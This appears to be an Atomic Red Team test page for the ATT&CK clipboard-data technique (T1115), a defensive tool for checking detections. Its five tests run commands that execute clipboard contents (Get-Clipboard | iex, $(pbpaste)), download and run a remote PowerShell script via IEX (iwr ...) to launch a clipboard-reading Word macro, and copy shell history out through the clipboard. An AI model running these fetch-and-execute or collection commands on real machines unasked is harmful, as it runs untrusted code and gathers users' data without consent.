T1115 - Clipboard Data
Description from ATT&CK (opens in a new tab)
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
For example, on Windows adversaries can access clipboard data by using
clip.exeorGet-Clipboard.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., Transmitted Data Manipulation (opens in a new tab)).(Citation: mining_ruby_reversinglabs)macOS and Linux also have commands, such as
pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)
Atomic Tests
-
Atomic Test #1 - Utilize Clipboard to store or execute commands from
-
Atomic Test #2 - Execute Commands from Clipboard using PowerShell
-
Atomic Test #5 - Add or copy content to clipboard with xClip
Atomic Test #1 - Utilize Clipboard to store or execute commands from
Add data to clipboard to copy off or execute commands from.
Supported Platforms: Windows
auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
Attack Commands: Run with command_prompt!
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txtCleanup Commands:
del %temp%\T1115.txt >nul 2>&1Atomic Test #2 - Execute Commands from Clipboard using PowerShell
Utilize PowerShell to echo a command to clipboard and execute it
Supported Platforms: Windows
auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
Attack Commands: Run with powershell!
echo Get-Process | clip
Get-Clipboard | iexAtomic Test #3 - Execute commands from clipboard
Echo a command to clipboard and execute it
Supported Platforms: macOS
auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
Attack Commands: Run with bash!
echo ifconfig | pbcopy
$(pbpaste)Atomic Test #4 - Collect Clipboard Data via VBA
This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
Supported Platforms: Windows
auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| ms_product | Maldoc application Word | string | Word |
Attack Commands: Run with powershell!
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"Cleanup Commands:
Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction IgnoreDependencies: Run with powershell!
Description: Microsoft #{ms_product} must be installed
Check Prereq Commands:
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }Get Prereq Commands:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"Atomic Test #5 - Add or copy content to clipboard with xClip
Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.
Supported Platforms: Linux
auto_generated_guid: ee363e53-b083-4230-aff3-f8d955f2d5bb
Attack Commands: Run with sh!
apt install xclip -y
history | tail -n 30 | xclip -sel clip
xclip -o > history.txt